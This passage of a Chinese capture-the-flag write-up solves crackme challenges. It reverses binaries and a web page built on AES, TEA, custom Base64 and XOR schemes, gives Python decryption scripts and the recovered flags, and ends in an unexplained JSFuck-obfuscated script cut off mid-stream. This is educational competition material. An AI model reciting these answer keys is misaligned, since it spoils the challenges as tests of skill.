rdi=32 [BINARY_OP ENTER] op=1 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=65 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=16 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=17 [BINARY_OP ENTER] op=3 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=34 [BINARY_OP ENTER] op=1 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=67 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=17 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=18 [BINARY_OP ENTER] op=3 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=36 [BINARY_OP ENTER] op=1 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=69 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=18 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=19 [BINARY_OP ENTER] op=3 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=38 [BINARY_OP ENTER] op=1 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=71 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=19 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=20 [BINARY_OP ENTER] op=3 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=40 [BINARY_OP ENTER] op=1 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=73 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=20 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=21 [BINARY_OP ENTER] op=3 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=42 [BINARY_OP ENTER] op=1 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=75 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=21 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=22 [BINARY_OP ENTER] op=3 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=44 [BINARY_OP ENTER] op=1 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=77 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=22 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=23 [BINARY_OP ENTER] op=3 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=46 [BINARY_OP ENTER] op=1 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=79 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=23 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=24 [BINARY_OP ENTER] op=3 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=48 [BINARY_OP ENTER] op=1 r12=1 r13=2401673024992 [BINARY_OP RESULT] rdi=81 [BINARY_OP ENTER] op=0 r12=1 r13=2401673024992 </code></pre> <p>密文</p> <pre><code>.data:00007FF7B489C0A4 aAYwmXsiqvQtwcn db 'A_\YWm]XsIQV{QTwCn{wrM~{jqoghd' </code></pre> <p>脚本</p> <pre><code>source = bytearray(b'A_\\YWm]XsIQV{QTwCn{wrM~{jqoghd') i = 0 while i &lt; 15: tmp = source[i] source[i] = source[29 - i] source[29 - i] = tmp i += 1 i = 0 while i &lt; 30: source[i] ^= (i + 1) * 2 i += 1 print(source.decode('utf-8')) </code></pre> <p>flag{fun_fact_its_pyc_vm_code}</p> <h2>Week 3</h2> <h1>1.BrokenData</h1> <p>IDA打开main函数,flag的长度是56,经过加密后与存放在unk_7FF64906061C0的密文进行对比,长度为0xD0,十进制为208</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-040.png" alt="" /></p> <p>我们的输入被存放在v11数组里,而程序里会复制一个字符串%es_&amp;ou_fou**_ke%到v9数组,而我们输入的flag的第十一个字符,会被引用到v9数组中的第一个,第五个,第十七个这些位置,来补全v9,v9就是key,我们可以一个一个尝试,但这里也能明显看出来是‘Y’</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-041.png" alt="" /></p> <p>之后通过sub_7FF6496022A0函数(MD5)对v9进行处理</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-042.png" alt="" /></p> <p>之后sub_7FF6496022A0函数把输入的flag按dword_7FF6496022A0把我们的输入划分为13段</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-043.png" alt="" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-044.png" alt="" /></p> <p>然后通过sub_7FF649601AA0函数对这13段进行AES-128加密</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-045.png" alt="" /></p> <p>这里的13段长度都为16,不够的用flag【5】补充,sub_7FF649601100是11轮密钥扩展</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-046.png" alt="" /></p> <p>最后就行对比</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-047.png" alt="" /></p> <p>脚本</p> <pre><code>import struct import hashlib EXE_PATH = 'BrokenData.exe' RVA = 0x61C0 LEN = 0xD0 SEG = [1,4,6,9,11,6,3,2,3,1,7,1,2] BASE = b"%es_&amp;ou_fou**_ke%" def read_pe_rva(path, rva, size): with open(path,'rb') as f: d=f.read() def u16(o): return struct.unpack_from('&lt;H', d, o)[0] def u32(o): return struct.unpack_from('&lt;I', d, o)[0] e=u32(0x3C) if d[e:e+4]!=b'PE\x00\x00': raise RuntimeError('not PE') ns=u16(e+6); so=u16(e+20); opt=e+24; sec=opt+so for i in range(ns): o=sec+i*40 vs=u32(o+8); va=u32(o+12); sr=u32(o+16); pr=u32(o+20) span=max(vs,sr) if va&lt;=rva&lt;va+span: off=pr+(rva-va) return d[off:off+size] raise RuntimeError('rva not found') def md5(x): return hashlib.md5(x).digest() class AES: def __init__(self,key): try: from Crypto.Cipher import AES as C self.t='p'; self.o=C.new(key,C.MODE_ECB) except Exception: from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes self.t='c'; self.c=Cipher(algorithms.AES(key), modes.ECB()) def dec(self,b): if self.t=='p': return self.o.decrypt(b) d=self.c.decryptor(); return d.update(b)+d.finalize() def enc(self,b): if self.t=='p': return self.o.encrypt(b) e=self.c.encryptor(); return e.update(b)+e.finalize() def keys(c): k1=md5(BASE) m=bytearray(BASE); m[0]=c; m[4]=c; m[16]=c k2=md5(bytes(m)) return k1,k2 def dec_all(ct,k1,k2): a1=AES(k1); a2=AES(k2) bl=[ct[i:i+16] for i in range(0,len(ct),16)] return [(a1.dec(b) if i%2==1 else a2.dec(b)) for i,b in enumerate(bl)] def recon(pl): f=bytearray(); pad=None for i,p in enumerate(pl): n=SEG[i]; s=p[:n]; t=p[n:] if t: if pad is None: pad=t[0] if any(x!=pad for x in t): return None,None f.extend(s) return bytes(f), pad def reenc(pl,k1,k2): a1=AES(k1); a2=AES(k2) out=bytearray() for i,p in enumerate(pl): out.extend(a1.enc(p) if i%2==1 else a2.enc(p)) return bytes(out) def main(): ct=read_pe_rva(EXE_PATH,RVA,LEN) for c in range(32,127): k1,k2=keys(c) pl=dec_all(ct,k1,k2) flag,p=recon(pl) if flag is None: continue if reenc(pl,k1,k2)==ct: print('flag[10]=', chr(c)) print('flag[5]=', chr(p) if p is not None else '') print('len=', len(flag)) try: print('flag=', flag.decode('utf-8')) except: print('flag_hex=', flag.hex()) return print('no candidate') if __name__=='__main__': main() </code></pre> <p>flag{Wow!_You_restored_the_data_and_this_is_your_reward}</p> <h1>2.Fisher</h1> <p>IDA打开,看main函数,main函数里面是一个自定义的Base64,最后与tAZ5tAZ5tAZ5vg7F2RZF2RZQ0gv5yCfAxSZKzq==对比</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-048.png" alt="" /></p> <p>加密函数sub_1400014B0</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-049.png" alt="" /></p> <p>自定义的base64表</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-050.png" alt="" /></p> <p>但我们使用自定义的base64解密得到的是NO_NO_NO_This_is_the_bad_one,显然不只是一个自定义的base64那么简单</p> <p>具体的实现在__scrt_common_main_seh</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-051.png" alt="" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-052.png" alt="" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-053.png" alt="" /></p> <p>去看sub_140001000函数,他调用了sub_140001020函数</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-054.png" alt="" /></p> <p>sub_140001020函数有调用了sub_140001150函数</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-055.png" alt="" /></p> <p>sub_140001150函数有调用了sub_1400016A0函数</p> <p>构造 TEA 的 128 位密钥(按栈内存布局小端拼接,前 8 字节显式给定,后 8 字节来自已清零的区域):</p> <ul> <li>a2[0] = 0x44332211 ( v9 = 1144201745 对应 0x44332211 )</li> <li>a2[1] = 0x55667788 (由 v10=0x55, v11=0x66, v12=0x77, v13=0x88 )</li> <li>a2[2] = 0x00000000</li> <li>a2[3] = 0x00000000</li> </ul> <p>把 64 字节明文分成 8 个连续的 8 字节块(每块 2× uint32 ),对每块调用一次 sub_1400016A0 (32 轮 TEA 变体)进行加密。</p> <pre><code>__int64 __fastcall sub_140001150(_BYTE *a1) { char v2; // [rsp+20h] [rbp-C8h] int k; // [rsp+24h] [rbp-C4h] int j; // [rsp+28h] [rbp-C0h] _BYTE v5[64]; // [rsp+30h] [rbp-B8h] int v6; // [rsp+70h] [rbp-78h] _BYTE *i; // [rsp+78h] [rbp-70h] int v9; // [rsp+80h] [rbp-68h] BYREF char v10; // [rsp+84h] [rbp-64h] char v11; // [rsp+85h] [rbp-63h] char v12; // [rsp+86h] [rbp-62h] char v13; // [rsp+87h] [rbp-61h] _BYTE v14[64]; // [rsp+90h] [rbp-58h] BYREF sub_140001430(); memset(v14, 0, sizeof(v14)); v6 = 0; for ( i = a1; *i; ++i ) ++v6; if ( v6 != 64 ) return 0xFFFFFFFFLL; memcpy(v14, a1, sizeof(v14)); v9 = 1144201745; v10 = 85; v11 = 102; v12 = 119; v13 = -120; for ( j = 0; j &lt; 8; ++j ) sub_1400016A0((unsigned int *)&amp;v14[8 * j], &amp;v9); v5[0] = 8; v5[1] = -18; v5[2] = 89; v5[3] = 77; v5[4] = 13; v5[5] = -32; v5[6] = -64; v5[7] = -119; v5[8] = -95; v5[9] = -104; v5[10] = -78; v5[11] = -69; v5[12] = -49; v5[13] = 112; v5[14] = 127; v5[15] = -27; v5[16] = -24; v5[17] = 47; v5[18] = -102; v5[19] = -118; v5[20] = 32; v5[21] = -53; v5[22] = 116; v5[23] = 18; v5[24] = -14; v5[25] = 48; v5[26] = 120; v5[27] = 31; v5[28] = 14; v5[29] = -21; v5[30] = 31; v5[31] = -120; v5[32] = -56; v5[33] = -68; v5[34] = 78; v5[35] = -8; v5[36] = 82; v5[37] = 19; v5[38] = 83; v5[39] = -117; v5[40] = -99; v5[41] = -65; v5[42] = 102; v5[43] = 11; v5[44] = 106; v5[45] = -84; v5[46] = 33; v5[47] = 79; v5[48] = -23; v5[49] = 31; v5[50] = 70; v5[51] = 70; v5[52] = -98; v5[53] = -53; v5[54] = -6; v5[55] = 99; v5[56] = -93; v5[57] = -123; v5[58] = 20; v5[59] = -55; v5[60] = 46; v5[61] = -9; v5[62] = 16; v5[63] = -59; v2 = 1; for ( k = 0; k &lt; 64; ++k ) { if ( v14[k] != v5[k] ) { v2 = 0; break; } } if ( v2 ) return 0; else return (unsigned int)-1; } </code></pre> <p>sub_1400016A0函数(TEA加密)</p> <pre><code>__int64 __fastcall sub_1400016A0(unsigned int *a1, _DWORD *a2) { __int64 result; // rax unsigned int v3; // [rsp+0h] [rbp-28h] unsigned int v4; // [rsp+4h] [rbp-24h] int v5; // [rsp+8h] [rbp-20h] unsigned int i; // [rsp+Ch] [rbp-1Ch] v3 = *a1; v4 = a1[1]; v5 = 0; for ( i = 0; i &lt; 0x20; ++i ) { v5 -= 1835914967; v3 += (a2[1] + (v4 &gt;&gt; 5)) ^ (v5 + v4) ^ (*a2 + 16 * v4); v4 += (a2[3] + (v3 &gt;&gt; 5)) ^ (v5 + v3) ^ (a2[2] + 16 * v3); } *a1 = v3; result = 4LL; a1[1] = v4; return result; } </code></pre> <p>加密完成后再与sub_140001150函数里的64个密文做对比</p> <p>完整流程就是我们的输入会先进行一次自定义的base64编码,然后再进行TEA变种加密</p> <p>主要点在于strcmp(Str1, "tAZ5tAZ5tAZ5vg7F2RZF2RZQ0gv5yCfAxSZKzq==")实际上跳到了 sub_140001150(Str1)</p> <p>解密脚本</p> <pre><code>import base64 CUSTOM_ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ+/" STD_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" MASK = 0xFFFFFFFF DELTA = 1835914967 V5_BYTES = bytes([ 8, 238, 89, 77, 13, 224, 192, 137, 161, 152, 178, 187, 207, 112, 127, 229, 232, 47, 154, 138, 32, 203, 116, 18, 242, 48, 120, 31, 14, 235, 31, 136, 200, 188, 78, 248, 82, 19, 83, 139, 157, 191, 102, 11, 106, 172, 33, 79, 233, 31, 70, 70, 158, 203, 250, 99, 163, 133, 20, 201, 46, 247, 16, 197, ]) K0 = 1144201745 &amp; MASK K1 = (85 &amp; 0xFF) | ((102 &amp; 0xFF) &lt;&lt; 8) | ((119 &amp; 0xFF) &lt;&lt; 16) | ((136 &amp; 0xFF) &lt;&lt; 24) KEY = (K0, K1, 0, 0) def tea_decrypt_block(v0, v1): sum_ = ((- (DELTA * 32)) &amp; MASK) for _ in range(32): v1 = (v1 - (((KEY[3] + (v0 &gt;&gt; 5)) &amp; MASK) ^ ((sum_ + v0) &amp; MASK) ^ ((KEY[2] + ((v0 &lt;&lt; 4) &amp; MASK)) &amp; MASK))) &amp; MASK v0 = (v0 - (((KEY[1] + (v1 &gt;&gt; 5)) &amp; MASK) ^ ((sum_ + v1) &amp; MASK) ^ ((KEY[0] + ((v1 &lt;&lt; 4) &amp; MASK)) &amp; MASK))) &amp; MASK sum_ = (sum_ + DELTA) &amp; MASK return v0, v1 def decrypt_v5_to_base64(): out = bytearray() for i in range(0, 64, 8): v0 = int.from_bytes(V5_BYTES[i:i+4], 'little') v1 = int.from_bytes(V5_BYTES[i+4:i+8], 'little') dv0, dv1 = tea_decrypt_block(v0, v1) out += dv0.to_bytes(4, 'little') out += dv1.to_bytes(4, 'little') return bytes(out) def custom_to_std_b64(s): table = {c: STD_ALPHABET[i] for i, c in enumerate(CUSTOM_ALPHABET)} return ''.join('=' if c == '=' else table[c] for c in s) def main(): pre = decrypt_v5_to_base64().decode('ascii') std_b64 = custom_to_std_b64(pre) plain = base64.b64decode(std_b64) try: s = plain.decode('ascii') if s.startswith('flag{') and s.endswith('}'): print(s) else: print('flag{' + s + '}') except UnicodeDecodeError: print('flag{' + plain.hex() + '}') if __name__ == '__main__': main() </code></pre> <p>flag{Fisherman_is_very_satisfied_with_your_bait}</p> <h1>3.Trap</h1> <p>IDA打卡,main函数如下:</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-056.png" alt="" /></p> <p>程序读取输入,通过sub_7FF77AD214E0来加密</p> <p>原文 P[i] ,加扰后的结果 E[i] ,密钥 K[j] :</p> <p>E[0] = P[0] ^ K[0]</p> <p>E[i] = P[i] ^ (i%2 ? (K[i % 11] + 1) &amp; 0xFF : K[i % 11]) ^ E[i-1] ( i &gt;= 1 )</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-057.png" alt="" /></p> <p>而byte_140005680为空,我们用x查看引用,发现sub_140001200调用了他</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-058.png" alt="" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-059.png" alt="" /></p> <p>点进去,看到</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-060.png" alt="" /></p> <p>key为[0x31, 0x69, 0x34, 0x57, 0x99, 0x35, 0x77, 0x11, 0x36, 0x52, 0x76]</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-061.png" alt="" /></p> <p>后边的这些就是干扰,反调试的,如果你要调试的话,就key和密文都要异或</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-062.png" alt="" /></p> <p>但实际上也调试不了</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-063.png" alt="" /></p> <p>最后对比</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-064.png" alt="" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-065.png" alt="" /></p> <pre><code>E_hex = [ 0x57, 0x51, 0x04, 0x3b, 0xd9, 0xb6, 0xf1, 0x96, 0xff, 0xc4, 0xf2, 0x96, 0xcc, 0xa6, 0xb4, 0x1b, 0x4d, 0x01, 0x60, 0x32, 0x04, 0x2c, 0x5b, 0x43, 0x47, 0x72, 0xb4, 0xb5, 0xb0, 0x96, 0xd0, 0xfe, ] E = bytes(E_hex) KEY = [ 0x31, 0x69, 0x34, 0x57, 0x99, 0x35, 0x77, 0x11, 0x36, 0x52, 0x76, ] def decrypt(E, key): P = bytearray(len(E)) n = len(key) for i in range(len(E)): k = key[i % n] if i &amp; 1: k = (k + 1) &amp; 0xFF P[i] = E[i] ^ k ^ (E[i - 1] if i else 0) return bytes(P) if __name__ == "__main__": print(decrypt(E, KEY).decode()) </code></pre> <p>flag{Y0u_h@V3_E5c4ped_Fr0m_7r4p}</p> <h1>4.wtf</h1> <p>打开靶机</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-066.png" alt="" /></p> <p>F12打开控制台,JS逆向,在元素里看到,我们输入,最后的打印结果有src.js来确定</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-067.png" alt="" /></p> <p>在资源里面找到src.js,是一个TEA算法</p> <pre><code>var _a; var ___Key = 'Komeji Satori'; var ans = [ 68, 241, 170, 187, 35, 199, 71, 125, 74, 176, 71, 216, 56, 85, 160, 159, 67, 234, 185, 29, 104, 120, 245, 18 ]; (_a = document.querySelector('#submit')) === null || _a === void 0 ? void 0 : _a.addEventListener('click', function () { var flag = document.querySelector('#input'); var input = flag.value; var bytes = new TextEncoder().encode(input); bytes[0] ^= 0x12; bytes[1] ^= 0x34; bytes[2] ^= 0x56; bytes[3] ^= 0x78; console.log(___Key); bytes = encode(bytes, ___Key); for (var i = 0; i &lt; bytes.length; i++) { bytes[i] ^= ___Key[i % ___Key.length].charCodeAt(0); } for (var i = 0; i &lt; ans.length; i++) { if (bytes[i] !== ans[i]) { document.querySelector('#input').value = 'Wrong flag!'; return; } } document.querySelector('#input').value = 'Correct flag! you find Koishi!'; document.body.style.backgroundImage = 'url(\'koishi.webp\')'; document.body.style.backgroundPosition = 'center'; }); function encode(input, key) { var _a; var keyBytes = new Uint8Array(16); var keyData = new TextEncoder().encode(key); for (var i = 0; i &lt; 16; i++) { keyBytes[i] = keyData[i % keyData.length]; } var k = new Uint32Array(4); for (var i = 0; i &lt; 4; i++) { k[i] = (keyBytes[i * 4] &lt;&lt; 24) | (keyBytes[i * 4 + 1] &lt;&lt; 16) | (keyBytes[i * 4 + 2] &lt;&lt; 8) | keyBytes[i * 4 + 3]; } var DELTA = 0x9e3779b9; function teaEncrypt(v0, v1) { var sum = 0; for (var i = 0; i &lt; 32; i++) { sum = (sum + DELTA) &gt;&gt;&gt; 0; v0 = (v0 + (((v1 &lt;&lt; 4) + k[0]) ^ (v1 + sum) ^ ((v1 &gt;&gt;&gt; 5) + k[1]))) &gt;&gt;&gt; 0; v1 = (v1 + (((v0 &lt;&lt; 4) + k[2]) ^ (v0 + sum) ^ ((v0 &gt;&gt;&gt; 5) + k[3]))) &gt;&gt;&gt; 0; } return [v0, v1]; } var paddedLength = Math.ceil(input.length / 8) * 8; var padded = new Uint8Array(paddedLength); padded.set(input); for (var i = 0; i &lt; paddedLength; i += 8) { var v0 = (padded[i] &lt;&lt; 24) | (padded[i + 1] &lt;&lt; 16) | (padded[i + 2] &lt;&lt; 8) | padded[i + 3]; var v1 = (padded[i + 4] &lt;&lt; 24) | (padded[i + 5] &lt;&lt; 16) | (padded[i + 6] &lt;&lt; 8) | padded[i + 7]; _a = teaEncrypt(v0, v1), v0 = _a[0], v1 = _a[1]; padded[i] = (v0 &gt;&gt;&gt; 24) &amp; 0xFF; padded[i + 1] = (v0 &gt;&gt;&gt; 16) &amp; 0xFF; padded[i + 2] = (v0 &gt;&gt;&gt; 8) &amp; 0xFF; padded[i + 3] = v0 &amp; 0xFF; padded[i + 4] = (v1 &gt;&gt;&gt; 24) &amp; 0xFF; padded[i + 5] = (v1 &gt;&gt;&gt; 16) &amp; 0xFF; padded[i + 6] = (v1 &gt;&gt;&gt; 8) &amp; 0xFF; padded[i + 7] = v1 &amp; 0xFF; } if (input.length &lt; paddedLength) { var newInput = new Uint8Array(paddedLength); newInput.set(input); input = newInput; } for (var i = 0; i &lt; paddedLength; i++) { input[i] = padded[i]; } return input; } </code></pre> <p>还有个div.js,里面都是</p> <pre><code>[][(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()([][(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]]+((!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]